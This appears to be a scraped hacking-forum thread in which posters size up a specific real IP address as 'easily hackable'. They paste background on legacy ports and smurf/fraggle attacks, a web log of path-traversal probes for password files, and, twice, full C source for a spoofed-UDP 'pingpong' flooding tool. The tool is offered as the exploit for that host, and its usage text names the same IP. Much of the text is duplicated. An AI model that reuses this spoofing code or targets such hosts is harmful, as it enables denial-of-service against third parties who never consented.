Damn.. its surely not a night shop.Lyecdevf wrote: 212.76.251.82 :13 - daytime -- open
Wonder wonder. ..hmm...
--
FrankB
please help i am anew hacker
-
Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- 18
- Location: In between life and death.
- Contact:
Since you are wondering I went off to collect some data on these uncomon open ports. What I found verified to me that this is a very easilly hackable site.
Port 11 systat
systat (TCP)
On some UNIX machines, creating a TCP connection to this port will dump the active processes and who launched them. The original intent for this was to make remote management of UNIX easier. However, intruders will query the systat information in order to map out the system.
This service is rarely available anymore because of these security concerns.
On UNIX, there are also local commands that show this information, such as systat or ps.
Port 7 echo
echo (UDP, TCP)
This simple port just echoes whatever is sent to it. This feature can be used in many attacks, such as fraggle.
Fraggle:
Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on that subnet respond to this broadcast. By spoofing the source IP address of the packet, all the responses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim with hundreds of responses for every request the hacker sends out.
There is not much the victim can do, because the incoming link is being overloaded. However, the victim does known the subnet number of the amplifier, and should contact the owner to tell them to turn off amplification (i.e. enable filtering of ICMP Echoes).
IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses, they will appear to come from all over the Internet.
On IRCs, hackers will use bots (automated programs) that connect to IRC servers and gather a victim's IP address. The bots then send the forged packets to the amplifiers to inundate the victim.
The owner of the amplifier is also a victim in this attack. They can easily defend against the attack by filtering the incoming broadcasts.
The hacker is able to saturate the links and gateways leading to the inundated victim, thus no firewall can really protect the victim. The only real defense is to trace back to the amplifiers and contact those system administrators.
The attack is named "smurf" after a popular program that generates the attack.
Fraggle, a variant uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to pingpong attack, and should be turned off.
Port 13 daytime
daytime (TCP, UDP)
Responds with the current time of day. The protocol specification doesn't clearly define the format of the data returned, so every machine responds in a slightly different format. This can be used to fingerprint machines.
Port 15 netstat
Port 19 chargen
chargen - generates a stream of characters (TCP) or a packet containing characters (UDP). See Simple Services for more information.
The 'chargen' service should only be enabled when testing the machine.
When contacted, chargen responds with some random text (something like all the characters in the alphabet in row). When contacted via UDP, it will respond with a single UDP packet. When contacted via TCP, it will continue spewing characters until the client closes the connection.
An easy attack is 'pingpong' which IP spoofs a packet between two machines running chargen. They will commence spewing characters at each other, slowing the machines down and saturating the network.
On UNIX, chargen should be disabled in '/etc/inetd.conf"
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
Disable these by simply inserting a hash character as the first character on the line:
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
On Windows, go to the Networking Control Panel and make sure that "Simple TCP Services" is disabled. None of these simple services are needed for anything but testing, but are extremely dangerous.
Port 37 time
Port 111 Sun RPC Portmapper
Port 11 systat
systat (TCP)
On some UNIX machines, creating a TCP connection to this port will dump the active processes and who launched them. The original intent for this was to make remote management of UNIX easier. However, intruders will query the systat information in order to map out the system.
This service is rarely available anymore because of these security concerns.
On UNIX, there are also local commands that show this information, such as systat or ps.
Port 7 echo
echo (UDP, TCP)
This simple port just echoes whatever is sent to it. This feature can be used in many attacks, such as fraggle.
Fraggle:
Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on that subnet respond to this broadcast. By spoofing the source IP address of the packet, all the responses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim with hundreds of responses for every request the hacker sends out.
There is not much the victim can do, because the incoming link is being overloaded. However, the victim does known the subnet number of the amplifier, and should contact the owner to tell them to turn off amplification (i.e. enable filtering of ICMP Echoes).
IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses, they will appear to come from all over the Internet.
On IRCs, hackers will use bots (automated programs) that connect to IRC servers and gather a victim's IP address. The bots then send the forged packets to the amplifiers to inundate the victim.
The owner of the amplifier is also a victim in this attack. They can easily defend against the attack by filtering the incoming broadcasts.
The hacker is able to saturate the links and gateways leading to the inundated victim, thus no firewall can really protect the victim. The only real defense is to trace back to the amplifiers and contact those system administrators.
The attack is named "smurf" after a popular program that generates the attack.
Fraggle, a variant uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to pingpong attack, and should be turned off.
Port 13 daytime
daytime (TCP, UDP)
Responds with the current time of day. The protocol specification doesn't clearly define the format of the data returned, so every machine responds in a slightly different format. This can be used to fingerprint machines.
Port 15 netstat
Port 19 chargen
chargen - generates a stream of characters (TCP) or a packet containing characters (UDP). See Simple Services for more information.
The 'chargen' service should only be enabled when testing the machine.
When contacted, chargen responds with some random text (something like all the characters in the alphabet in row). When contacted via UDP, it will respond with a single UDP packet. When contacted via TCP, it will continue spewing characters until the client closes the connection.
An easy attack is 'pingpong' which IP spoofs a packet between two machines running chargen. They will commence spewing characters at each other, slowing the machines down and saturating the network.
On UNIX, chargen should be disabled in '/etc/inetd.conf"
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
Disable these by simply inserting a hash character as the first character on the line:
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
On Windows, go to the Networking Control Panel and make sure that "Simple TCP Services" is disabled. None of these simple services are needed for anything but testing, but are extremely dangerous.
Port 37 time
Port 111 Sun RPC Portmapper
-
FrankB
- Ph. D. in Sucko'logics
- Posts: 315
- Joined: 06 Mar 2006, 17:00
- 18
- Location: Belgistahn
- Contact:
Kewl, poast Lyecdevf !
Even Nmap does not know what port 11 returns :
And maybe that is exactly what the convenient store holder at 212.76.251.82 wants bots to be fed with.
Maybe the convenient store guy out there is even NOT in production mode !
(i mean, his million dinars cash register is on another machine ?)
Wow, what now ?
Maybe he/she also wants bots and sockets to be returned a genuine fraud fac-simile og the `thing' they are looking for, which is called 'masquerading'.
Cute, no?
On the other hand, i contacted a former colleage of mine who worked for the Roumanian STASI, as for re-integration in society. He being on probation at that time, ex cyber criminal, convicted and sentenced as 'on parole', working thus for the ex-Roumanian state-police, he still has an active account on a mainframe in .. Croatia, that works hand in hand withe the NSA, yup
He returned me a list by FAX what has been logged on that machine by quering the PASSTHROUGH and IPTABLE rotation for yestarday on several of the LAN-switches on the overall UUNEt backbone and that very IP-address has been severly beastially hack-probed yesterday by vandals.
The LOG file goes :
.. and soforth..
Now, *someones* from suck-o.com wanted to get really beasty on that poor guy.
Luckily, all the bestiality was mere probes as my friend said and he told me that all those IP numbers are now logged 'by accident' for the next Nigerian-scam list and better put some conrete in their firewalls because the PINGBACK might hurt.
(Roumanians never laugh with that kind of situation)
A message to the admin of this froum though, in Roumanian :
Bad_Brain : , nyy guvf vf n cenax, srry serr gb qryrgr zl cbfg, v vf hfryrff ohg shaal, rkprcg gur YBT, gung vf trahvar naq gehr)"
I don't think *he* is joking.
--
FrankB
Even Nmap does not know what port 11 returns :
Code: Select all
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port11-TCP:V=4.01%I=7%D=5/7%Time=445DF6E4%P=i686-pc-linux-gnu%r(NULL,10
SF:4C,"Warning:\x20bad\x20syntax,
Maybe the convenient store guy out there is even NOT in production mode !
(i mean, his million dinars cash register is on another machine ?)
Wow, what now ?
Maybe he/she also wants bots and sockets to be returned a genuine fraud fac-simile og the `thing' they are looking for, which is called 'masquerading'.
Cute, no?
On the other hand, i contacted a former colleage of mine who worked for the Roumanian STASI, as for re-integration in society. He being on probation at that time, ex cyber criminal, convicted and sentenced as 'on parole', working thus for the ex-Roumanian state-police, he still has an active account on a mainframe in .. Croatia, that works hand in hand withe the NSA, yup
He returned me a list by FAX what has been logged on that machine by quering the PASSTHROUGH and IPTABLE rotation for yestarday on several of the LAN-switches on the overall UUNEt backbone and that very IP-address has been severly beastially hack-probed yesterday by vandals.
The LOG file goes :
Code: Select all
69.81.139.197 - - [06/May/2006:18:31:38 +0200] "GET /*/pub/LBG_sig.jpg HTTP/1.1" 304 - "http://www.suck-oold.com/modules.php?name=Forums&file=viewtopic&t=719&postdays=0&postorder=asc&start=0" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET / HTTP/1.0" 200 2843 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET /aeo HTTP/1.0" 404 197 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET /cgi-win/ HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /cgibin/qsammtx HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /cgiwin/ HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /scripts/ HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_private/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /cgi-win/bkl HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_vti_pvt/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_vti_cnf/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /cgi-win/bqq HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /_vti_bin/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /_vti_cnf/htuzu HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /bin/ HTTP/1.0" 404 198 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:41 +0200] "GET /_vti_bin/jqysr HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:41 +0200] "GET //%2E%2E%2E%2E%2E%2E/aaaaaa/../c%6Fnf%69g%2Esys HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:42 +0200] "GET /cgi/pubkyfc HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:42 +0200] "GET //cg%69-b%69n/aaaaaa/../p%61ssw%6Frds/./%75s%65rs%2Ehtx HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible)"
Now, *someones* from suck-o.com wanted to get really beasty on that poor guy.
Luckily, all the bestiality was mere probes as my friend said and he told me that all those IP numbers are now logged 'by accident' for the next Nigerian-scam list and better put some conrete in their firewalls because the PINGBACK might hurt.
(Roumanians never laugh with that kind of situation)
A message to the admin of this froum though, in Roumanian :
Bad_Brain : , nyy guvf vf n cenax, srry serr gb qryrgr zl cbfg, v vf hfryrff ohg shaal, rkprcg gur YBT, gung vf trahvar naq gehr
)"I don't think *he* is joking.
--
FrankB
what?!
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
-
Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- 18
- Location: In between life and death.
- Contact:
I think that the following would be the exploit for this site. It is written I believe for the open ports in our example.
I my self can not use it. If I was to assume that it was written in Perl I must note that I have not mangaed to get the neccerasy sortware on my computer to use it. As I understand you need to download Apache, Perl, and if you do not want to issue commands from command promt for the Perl to execute the desirable codes than you need some thing else as well.
*/
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <errno.h>
struct sockaddr addrfrom;
struct sockaddr addrto;
int s;
u_char outpack[65536];
struct iphdr *ip;
struct udphdr *udp;
main(int argc, char **argv) {
struct sockaddr_in *from;
struct sockaddr_in *to;
struct protoent *proto;
int i;
char *src,*dest;
int srcp, destp;
int packetsize,datasize;
fprintf(stderr,"PingPong 1.0 - 970621 by Willy Tarreau <tarreau@aemiaif.ibp.fr>\n");
fprintf(stderr,"<<< PLEASE USE THIS FOR TESTS ONLY AND WITH ADMINISTRATORS' AUTHORIZATION >>>\n\n");
if (argc!=5) {
fprintf(stderr,"wrong arg count.\nUsage: pingpong src_addr src_port dst_addr dst_port\n");
fprintf(stderr,"src_addr and dst_addr must be given as IP addresses (212.76.251.82)\n");
fprintf(stderr,"Note that it often works with 127.0.0.1 as src_addr !\n");
exit(2);
}
src=argv[1];
srcp=atoi(argv[2]);
dest=argv[3];
destp=atoi(argv[4]);
if (!(proto = getprotobyname("raw"))) {
perror("getprotobyname(raw)");
exit(2);
}
/* "raw" should be 255 */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) {
perror("socket");
exit(2);
}
memset(&addrfrom, 0, sizeof(struct sockaddr));
from = (struct sockaddr_in *)&addrfrom;
from->sin_family = AF_INET;
from->sin_port=htons(srcp);
if (!inet_aton(src, &from->sin_addr)) {
fprintf(stderr,"Incorrect address for 'from': %s\n",src);
exit(2);
}
memset(&addrto, 0, sizeof(struct sockaddr));
to = (struct sockaddr_in *)&addrto;
to->sin_family = AF_INET;
to->sin_port=htons(destp);
if (!inet_aton(dest, &to->sin_addr)) {
fprintf(stderr,"Incorrect address for 'to': %s\n",dest);
exit(2);
}
packetsize=0;
/* lets's build a complete UDP packet from scratch */
ip=(struct iphdr *)outpack;
ip->version=4; /* IPv4 */
ip->ihl=5; /* 5 words IP header */
ip->tos=0;
ip->id=0;
ip->frag_off=0;
ip->ttl=0x40;
if (!(proto = getprotobyname("udp"))) {
perror("getprotobyname(udp)");
exit(2);
}
/* "udp" should be 17 */
ip->protocol=proto->p_proto; /* udp */
ip->check=0; /* null checksum, will be automatically computed by the kernel */
ip->saddr=from->sin_addr.s_addr;
ip->daddr=to->sin_addr.s_addr;
/* end of ip header */
packetsize+=ip->ihl<<2;
/* udp header */
udp=(struct udphdr *)((int)outpack + (int)(ip->ihl<<2));
udp->source=htons(srcp);
udp->dest=htons(destp);
udp->check=0; /* ignore checksum */
packetsize+=sizeof(struct udphdr);
/* end of udp header */
/* add udp data here if you like */
for (datasize=0;datasize<8;datasize++) {
outpack[packetsize+datasize]='A'+datasize;
}
packetsize+=datasize;
udp->len=htons(sizeof(struct udphdr)+datasize);
ip->tot_len=htons(packetsize);
if (sendto(s, (char *)outpack, packetsize, 0, &addrto, sizeof(struct sockaddr))==-1) {
perror("sendto");
exit(2);
}
printf("packet sent !\n");
close(s);
printf("end\n");
exit(0);
}
I my self can not use it. If I was to assume that it was written in Perl I must note that I have not mangaed to get the neccerasy sortware on my computer to use it. As I understand you need to download Apache, Perl, and if you do not want to issue commands from command promt for the Perl to execute the desirable codes than you need some thing else as well.
*/
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <errno.h>
struct sockaddr addrfrom;
struct sockaddr addrto;
int s;
u_char outpack[65536];
struct iphdr *ip;
struct udphdr *udp;
main(int argc, char **argv) {
struct sockaddr_in *from;
struct sockaddr_in *to;
struct protoent *proto;
int i;
char *src,*dest;
int srcp, destp;
int packetsize,datasize;
fprintf(stderr,"PingPong 1.0 - 970621 by Willy Tarreau <tarreau@aemiaif.ibp.fr>\n");
fprintf(stderr,"<<< PLEASE USE THIS FOR TESTS ONLY AND WITH ADMINISTRATORS' AUTHORIZATION >>>\n\n");
if (argc!=5) {
fprintf(stderr,"wrong arg count.\nUsage: pingpong src_addr src_port dst_addr dst_port\n");
fprintf(stderr,"src_addr and dst_addr must be given as IP addresses (212.76.251.82)\n");
fprintf(stderr,"Note that it often works with 127.0.0.1 as src_addr !\n");
exit(2);
}
src=argv[1];
srcp=atoi(argv[2]);
dest=argv[3];
destp=atoi(argv[4]);
if (!(proto = getprotobyname("raw"))) {
perror("getprotobyname(raw)");
exit(2);
}
/* "raw" should be 255 */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) {
perror("socket");
exit(2);
}
memset(&addrfrom, 0, sizeof(struct sockaddr));
from = (struct sockaddr_in *)&addrfrom;
from->sin_family = AF_INET;
from->sin_port=htons(srcp);
if (!inet_aton(src, &from->sin_addr)) {
fprintf(stderr,"Incorrect address for 'from': %s\n",src);
exit(2);
}
memset(&addrto, 0, sizeof(struct sockaddr));
to = (struct sockaddr_in *)&addrto;
to->sin_family = AF_INET;
to->sin_port=htons(destp);
if (!inet_aton(dest, &to->sin_addr)) {
fprintf(stderr,"Incorrect address for 'to': %s\n",dest);
exit(2);
}
packetsize=0;
/* lets's build a complete UDP packet from scratch */
ip=(struct iphdr *)outpack;
ip->version=4; /* IPv4 */
ip->ihl=5; /* 5 words IP header */
ip->tos=0;
ip->id=0;
ip->frag_off=0;
ip->ttl=0x40;
if (!(proto = getprotobyname("udp"))) {
perror("getprotobyname(udp)");
exit(2);
}
/* "udp" should be 17 */
ip->protocol=proto->p_proto; /* udp */
ip->check=0; /* null checksum, will be automatically computed by the kernel */
ip->saddr=from->sin_addr.s_addr;
ip->daddr=to->sin_addr.s_addr;
/* end of ip header */
packetsize+=ip->ihl<<2;
/* udp header */
udp=(struct udphdr *)((int)outpack + (int)(ip->ihl<<2));
udp->source=htons(srcp);
udp->dest=htons(destp);
udp->check=0; /* ignore checksum */
packetsize+=sizeof(struct udphdr);
/* end of udp header */
/* add udp data here if you like */
for (datasize=0;datasize<8;datasize++) {
outpack[packetsize+datasize]='A'+datasize;
}
packetsize+=datasize;
udp->len=htons(sizeof(struct udphdr)+datasize);
ip->tot_len=htons(packetsize);
if (sendto(s, (char *)outpack, packetsize, 0, &addrto, sizeof(struct sockaddr))==-1) {
perror("sendto");
exit(2);
}
printf("packet sent !\n");
close(s);
printf("end\n");
exit(0);
}
-
Nerdz
- The Architect
- Posts: 1127
- Joined: 15 Jun 2005, 16:00
- 18
- Location: #db_error in: select usr.location from sucko_member where usr.id=63;
- Contact:
If I understand, someone from here have tried to hack the guy and he's in trouble?FrankB wrote: (Roumanians never laugh with that kind of situation)
A message to the admin of this froum though, in Roumanian :
Bad_Brain : , nyy guvf vf n cenax, srry serr gb qryrgr zl cbfg, v vf hfryrff ohg shaal, rkprcg gur YBT, gung vf trahvar naq gehr
I don't think *he* is joking.
--
FrankB
And what is the stuff in Roumanian?
Give a man a fish, you feed him for one day.
Learn a man to fish, you feed him for life.
Learn a man to fish, you feed him for life.
-
LBG
-
LBG
nerdz
Si vous êtes curieux, email j'à laplifom@gmail.com. Je ne peux pas vraiment le dire comme je veux ici, ainsi si vous voulez des détails, holla lol
-
FrankB
- Ph. D. in Sucko'logics
- Posts: 315
- Joined: 06 Mar 2006, 17:00
- 18
- Location: Belgistahn
- Contact:
Not exactly, it is written in 1998 by a college professor and it fits for Netware and eventually Linux kernels <2 .. in internal networks. Now, with some 'IP-spoofing', maybe, but still, we are in 2006 and many systems have Syn-flooding protected by default or by a firewall.Lyecdevf wrote:I think that the following would be the exploit for this site. It is written I believe for the open ports in our example.
In our example, as you say, IP_MASQUERADING is done twice : once by its ISP and yet another time on the Network servers of that very ISP (that is in the UK).
The firewall kernel masquerades outgoing packets and demasquerades the incoming packets. The masquerading and demasquerading is done in the function ip_forward. The function ip_fw_masquerade is called for forwarded packets and the function ip_fw_demasquerade is called for 'backward'ed packets.
Lyecdevf wrote: As I understand you need to download Apache, Perl[...]
No, It is written in plain old C and the very interesting snippet of code is based on common UNIX C libraries..
All you need is a compliant C compiler and all the other header files if you'd run it on a Windows machine .. on which you'd have to compile it again with a compliant compiler.
That is a long dance, since the code is more UNIX native and quite ages, chances are that you might have to rewrite it for modern C language on Windows.
Interesting snippet though. I like archives and old `things'
-- FrankB
Ook!Ook!
